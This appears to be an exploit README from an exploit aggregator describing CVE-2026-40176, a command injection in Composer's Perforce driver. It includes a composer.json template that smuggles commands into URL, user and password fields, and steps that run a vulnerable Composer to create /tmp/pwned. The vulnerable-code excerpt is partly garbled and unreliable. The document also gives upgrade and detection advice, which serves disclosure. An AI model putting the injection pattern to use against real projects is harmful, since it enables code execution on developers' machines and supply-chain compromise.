Share
## https://sploitus.com/exploit?id=A7682F24-D24E-5343-B019-5F50C3AE9FDE
# CVE-2026-40176
## Composer Perforce Repository Remote Code Execution (RCE)
[](https://getcomposer.org/)
[](https://nvd.nist.gov/)
[](https://owasp.org/www-community/attacks/Command_Injection)
---
## ๐ Summary
**Command Injection vulnerability in Composer's Perforce repository driver allowing Remote Code Execution (RCE) through insufficient input validation in repository URL processing.**
---
## ๐ฏ Vulnerability Details
| Property | Value |
|----------|-------|
| **CVE ID** | CVE-2026-40176 |
| **Affected Versions** | Composer getUser() . ' ';
if ($useClient)
$p4Command .= '-c ' . $this->getClient() . ' ';
}
$p4Command .= '-p ' . $this->getPort() . ' ' . $command;
return $p4Command;
}
```
All of it was not escaped properly, allowing an attacker to inject commands by crafting a malicious payload for all field with the `perforce` type.
**Vulnerable Code Pattern:**
```json
{
"repositories": [
{
"type": "perforce",
"url": "PERFORCE_URL; INJECTED_COMMAND #",
"depot": "depot",
"p4user": "user; INJECRTED_COMMAND #",
"p4password": "password; INJECTED_COMMAND #",
}
]
}
```
---
## ๐ Proof of Concept
This repository contains a working proof-of-concept demonstrating the vulnerability.
### Project Structure
```
CVE-2026-40176/
โโโ composer.json # Malicious Perforce repository config
โโโ vuln-composer.phar # Composer 2.2.26 (VULNERABLE)
โโโ patched-composer.phar # Composer 2.2.27 (PATCHED)
โโโ README.md # This file
```
### Reproduction Steps
#### 1. Clone the repository
```bash
git clone
cd CVE-2026-40176
```
#### 2. Verify Composer versions
```bash
php vuln-composer.phar --version
# Output: Composer version 2.2.26
php patched-composer.phar --version
# Output: Composer version 2.2.27
```
#### 3. Test vulnerable version
```bash
php vuln-composer.phar install
# OR
php vuln-composer.phar update
```
#### 4. Verify exploitation
```bash
ls -la /tmp/pwned
```
#### 5. Test patched version (should fail)
```bash
rm -f /tmp/pwned
php patched-composer.phar update
ls -la /tmp/pwned
# File should NOT exist (vulnerability is patched)
```
## ๐ก๏ธ Mitigation
### Immediate Actions
1. **Upgrade Composer** to version 2.2.27 or later:
```bash
composer self-update --2.2.27
# OR
wget https://getcomposer.org/download/2.2.27/composer.phar
```
2. **Review all composer.json files** for unknown or suspicious repository configurations
3. **Audit supply chain** - Check if any dependencies reference untrusted repositories
### Detection
```bash
# Check your Composer version
composer --version
# Search for Perforce repositories in your projects
grep -r "perforce" */composer.json
```